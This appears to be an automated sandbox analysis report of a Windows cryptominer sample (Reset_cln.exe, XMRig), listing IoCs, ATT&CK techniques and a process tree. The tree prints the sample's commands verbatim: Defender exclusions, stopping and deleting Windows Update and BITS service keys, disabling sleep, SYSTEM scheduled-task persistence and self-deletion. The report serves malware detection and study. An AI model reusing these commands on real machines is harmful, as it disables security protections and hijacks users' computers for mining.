xmrig | 14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371

Analysis

max time kernel
186s
max time network
183s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
10-12-2022 10:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Reset_cln.exe
Size

9.4MB
MD5

61c98e80e70b0f3e3951dccff351644c
SHA1

541c48539d943c6bd261127829f1e29904a5b945
SHA256

14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371
SHA512

fba3db8b8c9be2a5e2646bcb313e947d5634989ffee31501f40f1d0c14f6633e39161d2c35393c3a33fedf65674cab2fcd55f817e03a803216db6d94ad5183ca
SSDEEP

196608:anzwdq6YMOwsdK+kVylAou8uuYV0Jui6cCVIAKdG1PT:AkUMOwoKvVypLUVNn7KdaT

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

Reset_cln.execonhost.exe

description	pid	process	target process
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1804 created 1256	1804	Reset_cln.exe	Explorer.EXE
PID 1724 created 1256	1724	conhost.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1964-129-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1964-131-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

WindowsAutHost

pid process

108 WindowsAutHost
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
108	WindowsAutHost

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1964-129-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1964-131-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1396 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1784 taskeng.exe

pid	process
1396	cmd.exe

pid	process
1784	taskeng.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Reset_cln.exe

pid process

1804 Reset_cln.exe
1804 Reset_cln.exe

Drops file in Program Files directory 3 IoCs

Processes:

Reset_cln.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\WindowsServices\WindowsAutHost	Reset_cln.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1712 sc.exe
1532 sc.exe
1512 sc.exe
1124 sc.exe
432 sc.exe
1124 sc.exe
432 sc.exe
1004 sc.exe
1280 sc.exe
1168 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1952 schtasks.exe
584 schtasks.exe

pid	process
1712	sc.exe
1532	sc.exe
1512	sc.exe
1124	sc.exe
432	sc.exe
1124	sc.exe
432	sc.exe
1004	sc.exe
1280	sc.exe
1168	sc.exe

pid	process
1952	schtasks.exe
584	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5030359b8b0cd901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Reset_cln.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exesvchost.exe

pid	process
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1120	powershell.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1972	powershell.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
1804	Reset_cln.exe
592	powershell.exe
1608	powershell.exe
568	powershell.exe
1724	conhost.exe
1724	conhost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe
1964	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeWMIC.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeShutdownPrivilege	1812	powercfg.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1456	powercfg.exe
Token: SeShutdownPrivilege	844	powercfg.exe
Token: SeShutdownPrivilege	988	powercfg.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1084	powercfg.exe
Token: SeShutdownPrivilege	1688	powercfg.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1464	WMIC.exe
Token: SeSecurityPrivilege	1464	WMIC.exe
Token: SeTakeOwnershipPrivilege	1464	WMIC.exe
Token: SeLoadDriverPrivilege	1464	WMIC.exe
Token: SeSystemtimePrivilege	1464	WMIC.exe
Token: SeBackupPrivilege	1464	WMIC.exe
Token: SeRestorePrivilege	1464	WMIC.exe
Token: SeShutdownPrivilege	1464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1464	WMIC.exe
Token: SeUndockPrivilege	1464	WMIC.exe
Token: SeManageVolumePrivilege	1464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1464	WMIC.exe
Token: SeSecurityPrivilege	1464	WMIC.exe
Token: SeTakeOwnershipPrivilege	1464	WMIC.exe
Token: SeLoadDriverPrivilege	1464	WMIC.exe
Token: SeSystemtimePrivilege	1464	WMIC.exe
Token: SeBackupPrivilege	1464	WMIC.exe
Token: SeRestorePrivilege	1464	WMIC.exe
Token: SeShutdownPrivilege	1464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1464	WMIC.exe
Token: SeUndockPrivilege	1464	WMIC.exe
Token: SeManageVolumePrivilege	1464	WMIC.exe
Token: SeLockMemoryPrivilege	1964	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execmd.exepowershell.exetaskeng.execmd.execmd.exe

description	pid	process	target process
PID 2016 wrote to memory of 1124	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1124	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1124	2016	cmd.exe	sc.exe
PID 960 wrote to memory of 1812	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 1812	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 1812	960	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 432	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 432	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 432	2016	cmd.exe	sc.exe
PID 960 wrote to memory of 1456	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 1456	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 1456	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 844	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 844	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 844	960	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1712	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1712	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1712	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1532	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1532	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1532	2016	cmd.exe	sc.exe
PID 960 wrote to memory of 988	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 988	960	cmd.exe	powercfg.exe
PID 960 wrote to memory of 988	960	cmd.exe	powercfg.exe
PID 1972 wrote to memory of 1952	1972	powershell.exe	schtasks.exe
PID 1972 wrote to memory of 1952	1972	powershell.exe	schtasks.exe
PID 1972 wrote to memory of 1952	1972	powershell.exe	schtasks.exe
PID 2016 wrote to memory of 1512	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1512	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1512	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1756	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1756	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1756	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1776	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1776	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1776	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1544	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1544	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1544	2016	cmd.exe	reg.exe
PID 1396 wrote to memory of 1964	1396	cmd.exe	choice.exe
PID 1396 wrote to memory of 1964	1396	cmd.exe	choice.exe
PID 1396 wrote to memory of 1964	1396	cmd.exe	choice.exe
PID 2016 wrote to memory of 1468	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1468	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1468	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1460	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1460	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1460	2016	cmd.exe	reg.exe
PID 592 wrote to memory of 628	592	powershell.exe	schtasks.exe
PID 592 wrote to memory of 628	592	powershell.exe	schtasks.exe
PID 592 wrote to memory of 628	592	powershell.exe	schtasks.exe
PID 1784 wrote to memory of 108	1784	taskeng.exe	WindowsAutHost
PID 1784 wrote to memory of 108	1784	taskeng.exe	WindowsAutHost
PID 1784 wrote to memory of 108	1784	taskeng.exe	WindowsAutHost
PID 2032 wrote to memory of 1124	2032	cmd.exe	sc.exe
PID 2032 wrote to memory of 1124	2032	cmd.exe	sc.exe
PID 2032 wrote to memory of 1124	2032	cmd.exe	sc.exe
PID 1212 wrote to memory of 1084	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 1084	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 1084	1212	cmd.exe	powercfg.exe
PID 2032 wrote to memory of 432	2032	cmd.exe	sc.exe
PID 2032 wrote to memory of 432	2032	cmd.exe	sc.exe
PID 2032 wrote to memory of 432	2032	cmd.exe	sc.exe
PID 1212 wrote to memory of 1688	1212	cmd.exe	powercfg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe
"C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1124

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:432

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1712

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1532

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1512

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1756

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1776

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1544

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1468

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1460

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#oqljx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsAutHost /tr "'C:\Program Files\WindowsServices\WindowsAutHost'"
3⤵
- Creates scheduled task(s)
PID:1952

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xkiteqnm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
3⤵
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1124

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:432

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1004

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1280

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1168

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1412

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1032

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1544

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1560

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#oqljx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsAutHost /tr "'C:\Program Files\WindowsServices\WindowsAutHost'"
3⤵
- Creates scheduled task(s)
PID:584

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe dfrimgsypim
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1724

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1828

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe mgzslmvfizkgxjcp 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